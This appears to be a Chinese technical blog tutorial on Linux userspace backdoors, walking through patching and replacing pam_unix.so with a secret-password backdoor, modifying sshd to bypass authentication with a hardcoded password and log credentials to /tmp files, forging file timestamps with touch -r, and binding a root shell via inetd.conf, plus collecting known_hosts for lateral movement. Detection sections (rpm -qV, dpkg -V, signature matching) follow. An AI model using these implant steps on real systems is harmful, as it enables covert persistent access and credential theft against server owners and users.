Linux UserSpace Back-Door、Rootkit SSH/PAM Backdoor Attack And Defensive Tchnology
1. 安全攻防观点
0x1:For the Attacker
- Use System Builtin's to Simulate Rootkit Functionality. Stop relying on tools: "Master the environment.":尽量做到润物细无声,即把rootkit伪装成系统正常的工具、行为
Everything Is A Weapon:内力所到之处,皆为兵刃,对于操作系统的任何一个特性,只要找到正确的使用方法和组合模式,都极有可能形成一条入侵向量
0x2:For the Defender
- Know Your System, Before I Use it Against You. Thinking like an attacker: "Flip the evil bit."
Know Your Enemy : Know Your System:客户端攻防的战场主要在操作系统层面,同时也包括了和系统衔接的WEB、远程LOGIN等模块,了解它们的特性(尤其是高性能、边缘特性)才能更好地作出针对性的防御
Effectivness != Complexity:攻防是一个整体性的工程化项目,任何一个维度的漏洞都能够导致被黑客入侵,因此并一定说内核攻防就比应用层攻防重要,它们是同等重要的。攻防手段的有效性并不一定需要通过复杂性来保证
Relevant Link:
https://www.blacklodgeresearch.org/files/7613/6963/4840/Poor_Mans_Root_Kit_BLR_talk_PUBLIC_2013.pdf
2. SSH Pam后门
PAM(插入式验证模块(Pluggable Authentication Module,PAM))简单来说,就是提供了一组身份验证、密码验证的统一抽象接口,应用程序员可以使用这些API接口来实现与安全性相关的功能,PAM可以作为Linux登录验证(包括SSH)的统一验证入口点,也同样出于一点,黑客可以利用PAM部署SSH代码级的逻辑后门
0x1: 查询本机的PAM版本
aaarticlea/png;base64,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" alt="" />
0x2: 下载对应的源代码文件
http://pkgs.fedoraproject.org/repo/pkgs/pam/Linux-PAM-0.99.6.2.tar.bz2/52844c64efa6f8b6a9ed702eec341a4c/
http://www.linux-pam.org/pre/history/
http://www.linux-pam.org/pre/library/
0x3: 对原始的PAM so文件进行备份
cd /lib64/security
ll pam_unix.so
mv pam_unix.so pam_unix.so.bak
0x4: 修改源文件,添加逻辑后门
cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix
vim pam_unix_auth.c
aaarticlea/png;base64,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" alt="" />
0x5: 重新编译pam模块
cd /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/
./configure
make
0x6: 使用包含逻辑后门的pam模块替换系统默认的pam模块
cp /zhenghan/pam-backdoor/Linux-PAM-0.99.6.2/modules/pam_unix/.libs/pam_unix.so /lib64/security/pam_unix.so
0x7: 测试后门
. 使用正常root帐号、密码登录
. 使用root帐号,后门密码(pam)进行隐藏登录
0x8: 对抗检测方法
pam_unix是系统原生的模块,可以使用RPM的校验机制进行篡改检测
. centos rpm校验已安装包是否被修改
rpm -qV pam
....L.... c /etc/pam.d/fingerprint-auth
....L.... c /etc/pam.d/password-auth
....L.... c /etc/pam.d/smartcard-auth
....L.... c /etc/pam.d/system-auth
S.?...... /lib64/libpam.so.0.82.
S.?...... /lib64/libpam_misc.so.0.82.
S.....T. /lib64/security/pam_unix.so 结果含义
/*
如果一切均校验正常将不会产生任何输出。如果有不一致的地方,就会显示出来。输出格式
1. 8位长字符串: 8位字符的每一个 用以表示文件与RPM数据库中一种属性的比较结果("."表示检测通过)
1) S: 文件大小
2) M: 模式e (包括权限和文件类型)
3) 5: 校验和(md5)、?: 文件不可读
4) D: 设备
5) L: 符号链接
6) U: 用户
7) G: 组
8) T: 文件修改时间
2. c: 用以指配置文件
3. 文件名
*/ . ubuntu
dpkg -V libpam-modules
???????? c /etc/security/limits.conf
???????? /lib/x86_64-linux-gnu/security/pam_unix.so
从二进制的角度来看,被植入了代码级逻辑后门的so文件可以被当成病毒处理,通过提取逻辑后门附近的二进制特征码,加入杀毒特征库,可以实现对此类后门的查杀,并禁止其被ssh加载
. 提取包含逻辑后门的pam_unix.so的特征码
. 加入杀毒特征库
. 禁止逻辑后门pam_unix.so模块被ssh进程加载
Relevant Link:
http://w ww.csdn123.com/html/itweb/20130911/112822_112821_112829.htm
http://www.cnblogs.com/LittleHann/p/3662161.html
http://bobao.360.cn/learning/detail/454.html
http://www.awaysoft.com/taor/rpm%E6%A0%A1%E9%AA%8C%E5%B7%B2%E5%AE%89%E8%A3%85%E5%8C%85%E6%98%AF%E5%90%A6%E8%A2%AB%E4%BF%AE%E6%94%B9.html
3. SSHD后门
0x1:查看SSH版本
ssh -V
OpenSSH_7.2p2 Ubuntu-4ubuntu2., OpenSSL 1.0.2g Mar
0x2:下载SSH源码包
下载并修改sshd源码
vi includes.h //修改后门密码,记录文件位置, /*
+#define ILOG "/tmp/ilog" //记录登录到本机的用户名和密码
+#define OLOG "/tmp/olog" //记录本机登录到远程的用户名和密码
+#define SECRETPW "123456654321" //后门的密码
*/
0x3:插入后门代码逻辑
- 使用设置的后门密码,直接跨越验证逻辑登录
- 记录root及其他帐号的登录记录,相当于key logger
0x4:还原sshd_config文件时间戳
touch -r sshd_config.bak ssh_config
0x5:重启服务或重新载入配置
service sshd reload
0x6:对抗检测方法
- 二进制特征检测
- 通过ELF格式动态定位到目标函数的位置
- 在目标函数内部采用clamav的特征库定位方式:【特征:offset:length】
- 使用系统rpm检测ssh的完整性
- 检测程序中的string特征字符串,黑客部署的逻辑后门代码一般都有一段字符串特征码
- 尝试任意密码登录ssh,检查是否被黑客部署了"无密码逻辑后门",即黑客在判断逻辑中直接加入了return语句,跳过任何密码检查逻辑
Relevant Link:
http://www.freebuf.com/tools/10474.html
https://www.jianshu.com/p/b394528051c6
0x7:利用系统服务程序配置文件
修改:/etc/inetd.conf
daytime stream tcp nowait /bin/sh sh –I
用trojan程序替换in.telnetd、in.rexecd等 inted的服务程序重定向login程序。
4. $HOME/.ssh/known_hosts信息收集
“$HOME/.ssh/”目录下保存了本机的ssh登录记录,保存在“known_hosts”中,攻击者通过该文件可以直接获得DMZ/VPC或者常见下一跳IP。
